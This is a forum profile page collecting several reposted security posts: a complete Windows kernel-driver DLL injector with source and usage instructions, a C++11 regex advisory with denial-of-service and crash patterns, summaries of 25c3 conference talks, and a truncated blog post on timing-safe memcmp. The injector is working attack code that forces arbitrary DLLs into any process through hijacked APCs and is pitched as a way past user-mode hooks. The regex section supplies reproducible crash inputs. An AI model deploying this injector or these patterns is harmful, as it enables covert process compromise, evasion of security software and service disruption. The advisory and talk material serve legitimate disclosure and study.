-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
[h=1]Inject DLL from kernel mode[/h]Started By zwclose7, Feb 24 2014 04:05 PM Have you ever tried inject DLL from kernel mode? You can try to inject DLL from kernel mode when user mode methods doesn't work, e.g hooked NtOpenProcess/CreateRemoteThread, etc. How kernel mode injection works? 1) Get the address of KdVersionBlock from KPCR. (__readfsdword) 2) Get the address of MmLoadedUserImageList from KdVersionBlock. 3) Get the base address of ntdll from MmLoadedUserImageList. 4) Parse the export table of ntdll to locate LdrLoadDll. 5) Find a thread to hijack. (ZwQuerySystemInformation) 6) Open the target process. (PsLookupProcessByProcessId) 7) Open the target thread. (PsLookupThreadByThreadId) 8) Attach to target process's address space. (KeAttachProcess) 8) Allocate memory in target process's address space. (ZwAllocateVirtualMemory) 9) Copy the DLL name and APC routine into target process's address space. (memcpy,RtlInitUnicodeString) 10) Set ApcState.UserApcPending to TRUE to force the target thread to execute the APC routine. 11) Allocate an APC object from nonpaged pool. (ExAllocatePool) 12) Initialize the APC and insert it to the target thread. (KeInitializeApc,KeInsertQueueApc) 13) The target thread executes the APC routine in target process's address space. The APC routine calls LdrLoadDll to load the DLL. 14) Wait for the APC routine to complete. 15) Free the allocated memory. (ZwFreeVirtualMemory,ExFreePool) 16) Detach from target process's address space. (KeDetachProcess) 17) Dereference the target process and target thread. (ObDereferenceObject) Usage: To use the injector, run install.bat to install the driver, and then run kinject.exe from command prompt. kinject [PID] [DLL name] Source code (driver) #include <ntifs.h>#include <ntddk.h> typedef struct _SYSTEM_THREAD_INFORMATION { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientId; KPRIORITY Priority; LONG BasePriority; ULONG ContextSwitches; ULONG ThreadState; KWAIT_REASON WaitReason; }SYSTEM_THREAD_INFORMATION,*PSYSTEM_THREAD_INFORMA TION; typedef struct _SYSTEM_PROCESS_INFO { ULONG NextEntryOffset; ULONG NumberOfThreads; LARGE_INTEGER WorkingSetPrivateSize; ULONG HardFaultCount; ULONG NumberOfThreadsHighWatermark; ULONGLONG CycleTime; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ImageName; KPRIORITY BasePriority; HANDLE UniqueProcessId; HANDLE InheritedFromUniqueProcessId; ULONG HandleCount; ULONG SessionId; ULONG_PTR UniqueProcessKey; SIZE_T PeakVirtualSize; SIZE_T VirtualSize; ULONG PageFaultCount; SIZE_T PeakWorkingSetSize; SIZE_T WorkingSetSize; SIZE_T QuotaPeakPagedPoolUsage; SIZE_T QuotaPagedPoolUsage; SIZE_T QuotaPeakNonPagedPoolUsage; SIZE_T QuotaNonPagedPoolUsage; SIZE_T PagefileUsage; SIZE_T PeakPagefileUsage; SIZE_T PrivatePageCount; LARGE_INTEGER ReadOperationCount; LARGE_INTEGER WriteOperationCount; LARGE_INTEGER OtherOperationCount; LARGE_INTEGER ReadTransferCount; LARGE_INTEGER WriteTransferCount; LARGE_INTEGER OtherTransferCount; SYSTEM_THREAD_INFORMATION Threads[1]; }SYSTEM_PROCESS_INFO,*PSYSTEM_PROCESS_INFO; typedef struct _LDR_DATA_TABLE_ENTRY { LIST_ENTRY InLoadOrderLinks; LIST_ENTRY InMemoryOrderLinks; LIST_ENTRY InInitializationOrderLinks; PVOID DllBase; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; USHORT LoadCount; USHORT TlsIndex; union { LIST_ENTRY HashLinks; struct { PVOID SectionPointer; ULONG CheckSum; }; }; union { ULONG TimeDateStamp; PVOID LoadedImports; }; struct _ACTIVATION_CONTEXT * EntryPointActivationContext; PVOID PatchInformation; LIST_ENTRY ForwarderLinks; LIST_ENTRY ServiceTagLinks; LIST_ENTRY StaticLinks; }LDR_DATA_TABLE_ENTRY,*PLDR_DATA_TABLE_ENTRY; typedef struct _IMAGE_DOS_HEADER { USHORT e_magic; USHORT e_cblp; USHORT e_cp; USHORT e_crlc; USHORT e_cparhdr; USHORT e_minalloc; USHORT e_maxalloc; USHORT e_ss; USHORT e_sp; USHORT e_csum; USHORT e_ip; USHORT e_cs; USHORT e_lfarlc; USHORT e_ovno; USHORT e_res[4]; USHORT e_oemid; USHORT e_oeminfo; USHORT e_res2[10]; LONG e_lfanew; }IMAGE_DOS_HEADER,*PIMAGE_DOS_HEADER; typedef struct _IMAGE_DATA_DIRECTORY { ULONG VirtualAddress; ULONG Size; }IMAGE_DATA_DIRECTORY,*PIMAGE_DATA_DIRECTORY; typedef struct _IMAGE_FILE_HEADER { USHORT Machine; USHORT NumberOfSections; ULONG TimeDateStamp; ULONG PointerToSymbolTable; ULONG NumberOfSymbols; USHORT SizeOfOptionalHeader; USHORT Characteristics; }IMAGE_FILE_HEADER,*PIMAGE_FILE_HEADER; typedef struct _IMAGE_OPTIONAL_HEADER { USHORT Magic; UCHAR MajorLinkerVersion; UCHAR MinorLinkerVersion; ULONG SizeOfCode; ULONG SizeOfInitializedData; ULONG SizeOfUninitializedData; ULONG AddressOfEntryPoint; ULONG BaseOfCode; ULONG BaseOfData; ULONG ImageBase; ULONG SectionAlignment; ULONG FileAlignment; USHORT MajorOperatingSystemVersion; USHORT MinorOperatingSystemVersion; USHORT MajorImageVersion; USHORT MinorImageVersion; USHORT MajorSubsystemVersion; USHORT MinorSubsystemVersion; ULONG Win32VersionValue; ULONG SizeOfImage; ULONG SizeOfHeaders; ULONG CheckSum; USHORT Subsystem; USHORT DllCharacteristics; ULONG SizeOfStackReserve; ULONG SizeOfStackCommit; ULONG SizeOfHeapReserve; ULONG SizeOfHeapCommit; ULONG LoaderFlags; ULONG NumberOfRvaAndSizes; IMAGE_DATA_DIRECTORY DataDirectory[16]; }IMAGE_OPTIONAL_HEADER,*PIMAGE_OPTIONAL_HEADER; typedef struct _IMAGE_NT_HEADERS { ULONG Signature; IMAGE_FILE_HEADER FileHeader; IMAGE_OPTIONAL_HEADER OptionalHeader; }IMAGE_NT_HEADERS,*PIMAGE_NT_HEADERS; typedef struct _IMAGE_EXPORT_DIRECTORY { ULONG Characteristics; ULONG TimeDateStamp; USHORT MajorVersion; USHORT MinorVersion; ULONG Name; ULONG Base; ULONG NumberOfFunctions; ULONG NumberOfNames; ULONG AddressOfFunctions; ULONG AddressOfNames; ULONG AddressOfNameOrdinals; }IMAGE_EXPORT_DIRECTORY,*PIMAGE_EXPORT_DIRECTORY; #define IMAGE_DIRECTORY_ENTRY_EXPORT 0 extern "C" NTSTATUS ZwQuerySystemInformation(ULONG InfoClass,PVOID Buffer,ULONG Length,PULONG ReturnLength); extern "C" LPSTR PsGetProcessImageFileName(PEPROCESS Process); typedef NTSTATUS (*PLDR_LOAD_DLL)(PWSTR,PULONG,PUNICODE_STRING,PVOI D*); typedef struct _INJECT_INFO { HANDLE ProcessId; wchar_t DllName[1024]; }INJECT_INFO,*PINJECT_INFO; typedef struct _KINJECT { UNICODE_STRING DllName; wchar_t Buffer[1024]; PLDR_LOAD_DLL LdrLoadDll; PVOID DllBase; ULONG Executed; }KINJECT,*PKINJECT; typedef enum _KAPC_ENVIRONMENT { OriginalApcEnvironment, AttachedApcEnvironment, CurrentApcEnvironment, InsertApcEnvironment }KAPC_ENVIRONMENT,*PKAPC_ENVIRONMENT; typedef VOID (NTAPI *PKNORMAL_ROUTINE)( PVOID NormalContext, PVOID SystemArgument1, PVOID SystemArgument2 ); typedef VOID KKERNEL_ROUTINE( PRKAPC Apc, PKNORMAL_ROUTINE *NormalRoutine, PVOID *NormalContext, PVOID *SystemArgument1, PVOID *SystemArgument2 ); typedef KKERNEL_ROUTINE (NTAPI *PKKERNEL_ROUTINE); typedef VOID (NTAPI *PKRUNDOWN_ROUTINE)( PRKAPC Apc ); extern "C" void KeInitializeApc( PRKAPC Apc, PRKTHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine, PKRUNDOWN_ROUTINE RundownRoutine, PKNORMAL_ROUTINE NormalRoutine, KPROCESSOR_MODE ProcessorMode, PVOID NormalContext ); extern "C" BOOLEAN KeInsertQueueApc( PRKAPC Apc, PVOID SystemArgument1, PVOID SystemArgument2, KPRIORITY Increment ); UNICODE_STRING DeviceName=RTL_CONSTANT_STRING(L"\\Device\\KeInject"),SymbolicLink=RTL_CONSTANT_STRING(L"\\DosDevices\\KeInject"); ULONG ApcStateOffset; // Offset to the ApcState structure PLDR_LOAD_DLL LdrLoadDll; // LdrLoadDll address void Unload(PDRIVER_OBJECT pDriverObject) { DbgPrint("DLL injection driver unloaded."); IoDeleteSymbolicLink(&SymbolicLink); IoDeleteDevice(pDriverObject->DeviceObject); } void NTAPI KernelRoutine(PKAPC apc,PKNORMAL_ROUTINE* NormalRoutine,PVOID* NormalContext,PVOID* SystemArgument1,PVOID* SystemArgument2) { ExFreePool(apc); } void NTAPI InjectDllApc(PVOID NormalContext,PVOID SystemArgument1,PVOID SystemArgument2) { PKINJECT inject=(PKINJECT)NormalContext; inject->LdrLoadDll(NULL,NULL,&inject->DllName,&inject->DllBase); inject->Executed=TRUE; } BOOLEAN InjectDll(PINJECT_INFO InjectInfo) { PEPROCESS Process; PETHREAD Thread; PKINJECT mem; ULONG size; PKAPC_STATE ApcState; PKAPC apc; PVOID buffer; PSYSTEM_PROCESS_INFO pSpi; LARGE_INTEGER delay; buffer=ExAllocatePool(NonPagedPool,1024*1024); // Allocate memory for the system information if(!buffer) { DbgPrint("Error: Unable to allocate memory for the process thread list."); return FALSE; } // Get the process thread list if(!NT_SUCCESS(ZwQuerySystemInformation(5,buffer,1 024*1024,NULL))) { DbgPrint("Error: Unable to query process thread list."); ExFreePool(buffer); return FALSE; } pSpi=(PSYSTEM_PROCESS_INFO)buffer; // Find a target thread while(pSpi->NextEntryOffset) { if(pSpi->UniqueProcessId==InjectInfo->ProcessId) { DbgPrint("Target thread found. TID: %d",pSpi->Threads[0].ClientId.UniqueThread); break; } pSpi=(PSYSTEM_PROCESS_INFO)((PUCHAR)pSpi+pSpi->NextEntryOffset); } // Reference the target process if(!NT_SUCCESS(PsLookupProcessByProcessId(InjectIn fo->ProcessId,&Process))) { DbgPrint("Error: Unable to reference the target process."); ExFreePool(buffer); return FALSE; } DbgPrint("Process name: %s",PsGetProcessImageFileName(Process)); DbgPrint("EPROCESS address: %#x",Process); // Reference the target thread if(!NT_SUCCESS(PsLookupThreadByThreadId(pSpi->Threads[0].ClientId.UniqueThread,&Thread))) { DbgPrint("Error: Unable to reference the target thread."); ObDereferenceObject(Process); // Dereference the target process ExFreePool(buffer); // Free the allocated memory return FALSE; } DbgPrint("ETHREAD address: %#x",Thread); ExFreePool(buffer); // Free the allocated memory KeAttachProcess(Process); // Attach to target process's address space mem=NULL; size=4096; // Allocate memory in the target process if(!NT_SUCCESS(ZwAllocateVirtualMemory(NtCurrentPr ocess(),(PVOID*)&mem,0,&size,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE ))) { DbgPrint("Error: Unable to allocate memory in the target process."); KeDetachProcess(); // Detach from target process's address space ObDereferenceObject(Process); // Dereference the target process ObDereferenceObject(Thread); // Dereference the target thread return FALSE; } DbgPrint("Memory allocated at %#x",mem); mem->LdrLoadDll=LdrLoadDll; // Write the address of LdrLoadDll to target process wcscpy(mem->Buffer,InjectInfo->DllName); // Write the DLL name to target process RtlInitUnicodeString(&mem->DllName,mem->Buffer); // Initialize the UNICODE_STRING structure ApcState=(PKAPC_STATE)((PUCHAR)Thread+ApcStateOffs et); // Calculate the address of the ApcState structure ApcState->UserApcPending=TRUE; // Force the target thread to execute APC memcpy((PKINJECT)(mem+1),InjectDllApc,(ULONG)Kerne lRoutine-(ULONG)InjectDllApc); // Copy the APC code to target process DbgPrint("APC code address: %#x",(PKINJECT)(mem+1)); apc=(PKAPC)ExAllocatePool(NonPagedPool,sizeof(KAPC )); // Allocate the APC object if(!apc) { DbgPrint("Error: Unable to allocate the APC object."); size=0; ZwFreeVirtualMemory(NtCurrentProcess(),(PVOID*)&mem,&size,MEM_RELEASE); // Free the allocated memory KeDetachProcess(); // Detach from target process's address space ObDereferenceObject(Process); // Dereference the target process ObDereferenceObject(Thread); // Dereference the target thread return FALSE; } KeInitializeApc(apc,Thread,OriginalApcEnvironment, KernelRoutine,NULL,(PKNORMAL_ROUTINE)((PKINJECT)me m+1),UserMode,mem); // Initialize the APC DbgPrint("Inserting APC to target thread"); // Insert the APC to the target thread if(!KeInsertQueueApc(apc,NULL,NULL,IO_NO_INCREMENT )) { DbgPrint("Error: Unable to insert APC to target thread."); size=0; ZwFreeVirtualMemory(NtCurrentProcess(),(PVOID*)&mem,&size,MEM_RELEASE); // Free the allocated memory KeDetachProcess(); // Detach from target process's address space ObDereferenceObject(Process); // Dereference the target process ObDereferenceObject(Thread); // Dereference the target thread ExFreePool(apc); // Free the APC object return FALSE; } delay.QuadPart=-100*10000; while(!mem->Executed) { KeDelayExecutionThread(KernelMode,FALSE,&delay); // Wait for the injection to complete } if(!mem->DllBase) { DbgPrint("Error: Unable to inject DLL into target process."); size=0; ZwFreeVirtualMemory(NtCurrentProcess(),(PVOID*)&mem,&size,MEM_RELEASE); KeDetachProcess(); ObDereferenceObject(Process); ObDereferenceObject(Thread); return FALSE; } DbgPrint("DLL injected at %#x",mem->DllBase); size=0; ZwFreeVirtualMemory(NtCurrentProcess(),(PVOID*)&mem,&size,MEM_RELEASE); // Free the allocated memory KeDetachProcess(); // Detach from target process's address space ObDereferenceObject(Process); // Dereference the target process ObDereferenceObject(Thread); // Dereference the target thread return TRUE; } NTSTATUS DriverDispatch(PDEVICE_OBJECT DeviceObject,PIRP irp) { PIO_STACK_LOCATION io; PINJECT_INFO InjectInfo; NTSTATUS status; io=IoGetCurrentIrpStackLocation(irp); irp->IoStatus.Information=0; switch(io->MajorFunction) { case IRP_MJ_CREATE: status=STATUS_SUCCESS; break; case IRP_MJ_CLOSE: status=STATUS_SUCCESS; break; case IRP_MJ_READ: status=STATUS_SUCCESS; break; case IRP_MJ_WRITE: InjectInfo=(PINJECT_INFO)MmGetSystemAddressForMdlS afe(irp->MdlAddress,NormalPagePriority); if(!InjectInfo) { status=STATUS_INSUFFICIENT_RESOURCES; break; } if(!InjectDll(InjectInfo)) { status=STATUS_UNSUCCESSFUL; break; } status=STATUS_SUCCESS; irp->IoStatus.Information=sizeof(INJECT_INFO); break; default: status=STATUS_INVALID_DEVICE_REQUEST; break; } irp->IoStatus.Status=status; IoCompleteRequest(irp,IO_NO_INCREMENT); return status; } NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath) { PDEVICE_OBJECT DeviceObject; PEPROCESS Process; PETHREAD Thread; PKAPC_STATE ApcState; PVOID KdVersionBlock,NtdllBase; PULONG ptr,Functions,Names; PUSHORT Ordinals; PLDR_DATA_TABLE_ENTRY MmLoadedUserImageList,ModuleEntry; ULONG i; PIMAGE_DOS_HEADER pIDH; PIMAGE_NT_HEADERS pINH; PIMAGE_EXPORT_DIRECTORY pIED; pDriverObject->DriverUnload=Unload; KdVersionBlock=(PVOID)__readfsdword(0x34); // Get the KdVersionBlock MmLoadedUserImageList=*(PLDR_DATA_TABLE_ENTRY*)((P UCHAR)KdVersionBlock+0x228); // Get the MmLoadUserImageList DbgPrint("KdVersionBlock address: %#x",KdVersionBlock); DbgPrint("MmLoadedUserImageList address: %#x",MmLoadedUserImageList); ModuleEntry=(PLDR_DATA_TABLE_ENTRY)MmLoadedUserIma geList->InLoadOrderLinks.Flink; // Move to first entry NtdllBase=ModuleEntry->DllBase; // ntdll is always located in first entry DbgPrint("ntdll base address: %#x",NtdllBase); pIDH=(PIMAGE_DOS_HEADER)NtdllBase; pINH=(PIMAGE_NT_HEADERS)((PUCHAR)NtdllBase+pIDH->e_lfanew); pIED=(PIMAGE_EXPORT_DIRECTORY)((PUCHAR)NtdllBase+p INH->OptionalHeader.DataDirectory[iMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); Functions=(PULONG)((PUCHAR)NtdllBase+pIED->AddressOfFunctions); Names=(PULONG)((PUCHAR)NtdllBase+pIED->AddressOfNames); Ordinals=(PUSHORT)((PUCHAR)NtdllBase+pIED->AddressOfNameOrdinals); // Parse the export table to locate LdrLoadDll for(i=0;i<pIED->NumberOfNames;i++) { if(!strcmp((char*)NtdllBase+Names,"LdrLoadDll")) { LdrLoadDll=(PLDR_LOAD_DLL)((PUCHAR)NtdllBase+Funct ions[Ordinals]); break; } } DbgPrint("LdrLoadDll address: %#x",LdrLoadDll); Process=PsGetCurrentProcess(); Thread=PsGetCurrentThread(); ptr=(PULONG)Thread; // Locate the ApcState structure for(i=0;i<512;i++) { if(ptr==(ULONG)Process) { ApcState=CONTAINING_RECORD(&ptr,KAPC_STATE,Process); // Get the actual address of KAPC_STATE ApcStateOffset=(ULONG)ApcState-(ULONG)Thread; // Calculate the offset of the ApcState structure break; } } DbgPrint("ApcState offset: %#x",ApcStateOffset); IoCreateDevice(pDriverObject,0,&DeviceName,FILE_DEVICE_UNKNOWN,FILE_DEVICE_SECURE_ OPEN,FALSE,&DeviceObject); IoCreateSymbolicLink(&SymbolicLink,&DeviceName); for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++) { pDriverObject->MajorFunction=DriverDispatch; } DeviceObject->Flags&=~DO_DEVICE_INITIALIZING; DeviceObject->Flags|=DO_DIRECT_IO; DbgPrint("DLL injection driver loaded."); return STATUS_SUCCESS; } Source code (user mode application) #include <stdio.h>#include <Windows.h> typedef struct _INJECT_INFO { HANDLE ProcessId; wchar_t DllName[1024]; }INJECT_INFO,*PINJECT_INFO; int wmain(int argc,wchar_t* argv[]) { HANDLE hFile; DWORD write; INJECT_INFO InjectInfo; if(argc<3) { printf("\nUsage: kinject [PID] [DLL name]\n"); return -1; } hFile=CreateFile(L"\\\\.\\KeInject",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_S HARE_WRITE,NULL,OPEN_EXISTING,0,NULL); if(hFile==INVALID_HANDLE_VALUE) { printf("\nError: Unable to connect to the driver (%d)\n",GetLastError()); return -1; } memset(&InjectInfo,0,sizeof(INJECT_INFO)); InjectInfo.ProcessId=(HANDLE)wcstoul(argv[1],NULL,0); wcscpy(InjectInfo.DllName,argv[2]); if(!WriteFile(hFile,&InjectInfo,sizeof(INJECT_INFO),&write,NULL)) { printf("\nError: Unable to write data to the driver (%d)\n",GetLastError()); CloseHandle(hFile); return -1; } CloseHandle(hFile); return 0; } [h=4]Attached Files[/h] KeInject.zip 447.64KB 438 downloads Sursa: Inject DLL from kernel mode - Source Codes - rohitab.com - Forums
-
C++11 Resource Exhaustion Authored by Maksymilian Arciemowicz | Site cxsecurity.com GCC and CLANG C++11 regex functionality suffers from resource exhaustion issues. C++11 <regex> insecure by default http://cxsecurity.com/issue/WLB-2014070187 --- 0 Description --- In this article I will present a conclusion of testing the new 'objective regex' in several implementation of standard c++ library like libcxx (clang) and stdlibc++ (gcc). The results show the weakness in official supported implementations. Huge complexity and memory exhaustion were well known in most of libc libraries. Theoretical the new c++11 <regex> eliminate resource exhaustion by specifying special limits preventing for evil patterns. In glibc there was the conviction that for the safety of use regcomp() respond vendor using regex implementation. However, it is difficult to do the parser of regular expression in clients applications and others remote affected. The exceptions support for regex errors looks very promising. Let's see some part of documentation std::regex_error -std::regex_constants::error_type----------------------- error_space there was not enough memory to convert the expression into a finite state machine error_complexity the complexity of an attempted match exceeded a predefined level error_stack there was not enough memory to perform a match -std::regex_constants::error_type----------------------- error_complexity looks promising but which the value of level complexity is the best'? There is many interpretations between usability and security. In security aspect this level should be low for to keep real time execution. In contrast to the static code analysis where execution time is not so important. The other constants like error_space and error_stack are also interesting in security view. After official release for stdlibc++ <regex> in GCC 4.9.0 I have decided check this implementation. To prove that these limits do not fulfill their role, I reported below issues GCC: libstdc++ C++11 regex resource exhaustion https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61601 libstdc++ C++11 regex memory corruption https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61582 CLANG: libcxx C++11 regex cpu resource exhaustion http://llvm.org/bugs/show_bug.cgi?id=20291 In my observation libc++ wins in performance. Only problem with error complexity reported. In ticket #20291 we are searching answer for default pre-set level value. However for each use can be personal. GCC has fixed most dangerous issues before releasing official version 4.9.0 where <regex> is supported. Anyway stack overflow still occurs in last regex implementation. --- 0.1 GCC before 4.9 Memory corruption --- # ./c11RE '(|' Segmentation fault (core dumped) --- 0.2 GCC 4.9 Memory corruption --- (gdb) r '((.*)()?*{100})' Starting program: /home/cx/REstd11/kozak5/./c11re '((.*)()?*{100})' Program received signal SIGSEGV, Segmentation fault. 0x0000000000402f15 in std::_Bit_reference::operator bool() const --- 0.3 GCC Trunk Stack Overflow --- Starting program: /home/cx/REtrunk/kozak5/t3 '(.*{100}{300})' Program received signal SIGSEGV, Segmentation fault. 0x000000000040c22a in std::__detail::_Executor<char const*, std::allocator<std::sub_match<char const*> >, std::regex_traits<char>, true>::_M_dfs(std::__detail::_Executor<char const*, std::allocator<std::sub_match<char const*> >, std::regex_traits<char>, true>::_Match_mode, long) () --- 0.4 CLANG CPU Exhaustion PoC --- #include <iostream> #include <regex> #include <string> using namespace std; int main() { try { regex r("(.*(.*){999999999999999999999999999999999})", regex_constants::extended); smatch results; string test_str = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||"; if (regex_search(test_str, results, r)) cout << results.str() << endl; else cout << "no match"; } catch (regex_error &e) { cout << "extended: what: " << e.what() << "; code: " << e.code() << endl; } return 0; } --- CLANG CPU Exhaustion --- --- 1 Conclusion --- I think It's dangerous situation what may have a bearing on the quality similar to the glibc <regex.h>. Maybe only a new type of extended regular expressions provide safety? It's good moment to start discussion about of safety regex in new c++. --- 2 References --- libstdc++ C++11 regex resource exhaustion https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61601 libstdc++ C++11 regex memory corruption https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61582 libcxx C++11 regex cpu resource exhaustion http://llvm.org/bugs/show_bug.cgi?id=20291 GCC 4.9 Release Series New Features https://gcc.gnu.org/gcc-4.9/changes.html --- 3 Thanks --- gcc and clang support and KacperR --- 4 About --- Author: Maksymilian Arciemowicz Contact: http://cxsecurity.com/wlb/add/ Sursa: C++11 Resource Exhaustion ? Packet Storm
-
25c3 - An Introduction To New Stream Cipher Designs Description: An introduction to new stream cipher designs Turning data into line noise and back Even with "nothing to hide", we want to protect the privacy of our bits and bytes. Encryption is an important tool for this, and stream ciphers are a major class of symmetric-key encryption schemes. Algorithms such as RC4 (used in WEP/WPA, bittorrent, SSL), A5/1 (GSM telephony), E0 (bluetooth), as well as AES in counter (CTR) mode, are important examples of stream ciphers used in everyday applications. Whereas a block cipher such as AES works by encrypting fixed-length data blocks (and chaining these together in a suitable mode of operation), stream ciphers output an unique and arbitrary-length keystream of pseudorandom bits or bytes, which is simply XORed with the plaintext stream to produce the ciphertext. Advantages of stream ciphers often include smaller hardware footprint and higher encryption speeds than comparable block ciphers such as AES. However, cryptanalysis has led to attacks on many of the existing algorithms. The ECRYPT Stream Cipher Project (eSTREAM) has been a 4-year project funded by the EU to evaluate new and promising stream ciphers. The project ended in April 2008, with a final portfolio which currently consists of 7 ciphers: 3 suitable for hardware implementation, and 4 aimed at software environments. The portfolio ciphers are considered to provide an advantage over plain AES in at least one significant aspect, but the designs are very different and often suited for different applications. Since the eSTREAM ciphers are quite new, many of them are not well known outside the academic community. The goal of this talk is to give a very quick presentation of each of the 7 portfolio ciphers: Grain v1, MICKEY v2, Trivium, HC-128, Rabbit, Salsa20/12 and SOSEMANUK. For More Information please visit : - 25C3: speakers Sursa: 25c3 - An Introduction To New Stream Cipher Designs
-
25c3 - Full Disk Encryption Crash Course Description: Full-Disk-Encryption Crash-Course Everything to hide This is not a hacking presentation, no vulnerabilities are presented. It's a crash-course in full-disk-encryption ("FDE") concepts, products and implementation aspects. An overview of both commercial and open-source offerings for Windows, Linux, and MacOSX is given. A (programmer's) look at the open-source solutions concludes the presentation. Full-Disk-Encryption is an important aspect of data security and everyone should use an appropriate solution to protect their (especially mobile) systems and data. This lecture covers the technology behind Full-Disk-Encryption software products. The established technical architectures of software solutions for Microsoft Windows and Linux are presented in this lecture: Pre-Boot-Authentication, encryption driver and in-place filesystem encryption. An overview of commercial products and open-source offerings for Windows, Linux and OSX is given. Distinguishing features of specific products and additional topics are covered, including: TPM support (OS binding and key storage), multi-disk support and threats. The last segment of the lecture focuses on open-source solutions: TrueCrypt's volume specifications, TrueCrypt's hidden volume capabilities and a comparison of in-place filesystem encryption implementations of TrueCrypt and DiskCryptor. A feature wish-list for open-source Full-Disk-Encryption solutions completes the lecture. For More Information please visit : - 25C3: speakers Sursa: 25c3 - Full Disk Encryption Crash Course
-
25c3 - Chip Reverse Engineering Description: Chip Reverse Engineering Cryptographic algorithms are often kept secret in the false belief that this provides security. To find and analyze these algorithms, we reverse-engineering the silicon chips that implement them. With simple tools, we open the chips, take pictures, and analyze their internal structures. The talk provides all the details you need to start reversing chips yourself. Happy hacking! For More Information please visit : - 25C3: speakers Sursa: 25c3 - Chip Reverse Engineering
-
25c3 - Security Failures In Smart Card Payment Systems Description: Security Failures in Smart Card Payment Systems Tampering the Tamper-Proof PIN entry devices (PED) are used in the Chip & PIN (EMV) system to process customers' card details and PINs in stores world-wide. Because of the highly sensitive information they handle, PEDs are subject to an extensive security evaluation procedure. We have demonstrated that the tamper protection of two popular PEDs can be easily circumvented with a paperclip, some basic technical skills, and off-the-shelf electronics. PIN entry devices (PEDs) are critical security components in Chip & PIN (EMV) smartcard payment systems as they receive a customer's card and PIN. Their approval is subject to an extensive suite of evaluation and certification procedures. We have demonstrated that the tamper proofing of PEDs is unsatisfactory, as is the certification process. This talk will discuss practical low-cost attacks on two certified, widely-deployed PEDs – the Ingenico i3300 and the Dione Xtreme. By tapping inadequately protected smartcard communications, an attacker with basic technical skills can expose card details and PINs, leaving cardholders open to fraud. The talk will describe the anti-tampering mechanisms of the two PEDs and show that, while the specific protection measures mostly work as intended, critical vulnerabilities arise because of the poor integration of cryptographic, physical and procedural protection. These failures are important not only because they allow fraud to be committed, but also because of their affect on customer liability. As Chip & PIN was claimed to be foolproof, victims of fraud often find themselves accused of being negligent, or even complicit in the crime. The results of this work will help customers in this position argue that their losses should be refunded. For More Information please visit : - 25C3: speakers Sursa: 25c3 - Security Failures In Smart Card Payment Systems
-
25c3 - Hacking The Iphone Description: Speakers: MuscleNerd, pytey, planetbeing Apple's iPhone has made a tremendous impact on the smartphone market and the public consciousness, but it has also highlighted their desire to carefully control the device with draconian restrictions. These restrictions prevent users from choosing to run third-party applications unauthorized by Apple and using the devices on carriers not approved by Apple. Since its release, a tremendous amount of effort has been made to remove these restrictions for the benefit of the community. A year later, we have now learned much about its inner workings and have methods to circumvent these restrictions. This talk will summarize what we have learned about the internal architecture of the iPhone platform, its security, and the ways we have found to defeat these security measures. More information about the 25th Chaos Communication Congress can be found via the Chaos Communication For More Information please visit : - 25C3: speakers Sursa: 25c3 - Hacking The Iphone
-
25c3 - Tricks Makes You Smile Description: Tricks: makes you smile A clever or ingenious device or expedient; adroit technique: the tricks of the trade. A collection of engaging techniques, some unreleased and some perhaps forgotten, to make pentesting fun again. From layer 3 attacks that still work, to user interaction based exploits that aren't 'clickjacking', to local root privilege escalation without exploits and uncommon web application exploitation techniques. For More Information please visit : - 25C3: speakers
-
25c3 - Anatomy Of Smartphone Hardware Description: Do you know the architecture of contemporary mobile phone hardware? This presentation will explain about the individual major building blocks and overall architecture of contemporary GSM and UMTS smartphones. We will start from a general block diagram level and then look at actual chipsets used in mobile devices, ranging from SoC to RAM and flash memory technologies, Bluetooth, Mobile WiFi chipsets, busses/protocols as well as the GSM baseband side. The main focus will be about the OpenMoko Freerunner (GTA02) hardware, since the schematics are open and can be used for reference during the lecture. However, we will also look into tighter integrated components of various vendors like Qualcomms MSM7xxx, Samsung S3C64xx, TI OMAP35xx and others. For More Information please visit : - 25C3: speakers Sursa: 25c3 - Anatomy Of Smartphone Hardware
-
25c3 - Analyzing Rfid Security Description: Analyzing RFID Security Many RFID tags have weaknesses, but the security level of different tags varies widely. Using the Mifare Classic cards as an example, we illustrate the complexity of RFID systems and discuss different attack vectors. To empower further analysis of RFID cards, we release an open-source, software-controlled, and extensible RFID reader with support for most common standards. RFID tags and contact-less smart cards are regularly criticized for their lack of security. While many RFID tags have weaknesses, the security level of different tags varies widely. Using the Mifare Classic cards as an example, we illustrate the complexity of RFID systems and discuss different attack vectors. To empower further analysis of RFID cards, we release an open-source, software-controlled, and extensible RFID reader with support for most common standards. For More Information please visit : - 25C3: speakers Sursa: 25c3 - Analyzing Rfid Security
-
Timing-safe memcmp and API parity Nate Lawson @ 4:03 am OpenBSD released a new API with a timing-safe bcmp and memcmp. I strongly agree with their strategy of encouraging developers to adopt “safe” APIs, even at a slight performance loss. The strlcpy/strlcat family of functions they pioneered have been immensely helpful against overflows. Data-independent timing routines are extremely hard to get right, and the farther you are from the hardware, the harder it is to avoid unintended leakage. Your best bet if working in an embedded environment, is to use assembly and thoroughly test on the target CPU under multiple scenarios (interrupts, power management throttling clocks, etc.) Moving up to C creates a lot of pitfalls, especially if you support multiple compilers and versions. Now you are subject to micro-architectural variance, such as cache, branch prediction, bus contention, etc. And compilers have a lot of leeway with optimizing away code with strictly-intended behavior. While I think the timing-safe bcmp (straightforward comparison for equality) is useful, I’m more concerned with the new memcmp variant. It is more complicated and subject to compiler and CPU quirks (because of the additional ordering requirements), may confuse developers who really want bcmp, and could encourage unsafe 